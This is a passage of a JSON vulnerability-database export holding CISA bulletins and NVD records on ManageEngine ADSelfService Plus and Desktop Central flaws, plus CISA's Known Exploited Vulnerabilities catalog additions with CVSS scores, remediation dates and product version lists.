"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", "id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. Additionally, CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T18:09:09", "description": "CISA has added thirteen new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://cyber.dhs.gov/bod/22-01/>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2021-12-10T00:00:00", "id": "CISA:380E63A9EAAD85FA1950A6973017E11B", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:29:50", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2022-01-25T00:00:00", "id": "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-07-13T18:02:26", "description": "Zoho ManageEngine Desktop Central before 10.1.2137.9 and Desktop Central MSP before 10.1.2137.9 allow attackers to bypass authentication, and read sensitive information or upload an arbitrary ZIP archive to the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-18T10:15:00", "type": "cve", "title": "CVE-2021-44757", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-44757", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44757", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-07-13T18:04:18", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-12T05:15:00", "type": "cve", "title": "CVE-2021-44515", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "id": "CVE-2021-44515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2022-03-23T19:10:37", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T17:15:00", "type": "cve", "title": "CVE-2021-40539", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-29T17:18:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.8", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.4", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.2", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.7", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.3", "cpe:/a:zohocorp:manageengine_adselfservice_plus:4.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0.6", "cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.6"], "id": "CVE-2021-40539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5805:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5709:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5806:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4550:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5813:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4580:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5809:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5801:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5321:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5040:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5704:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5311:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5327:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4544:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5800:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5808:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5804:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5705:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5701:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5810:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5816:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5325:*:*:*:*:*:*", 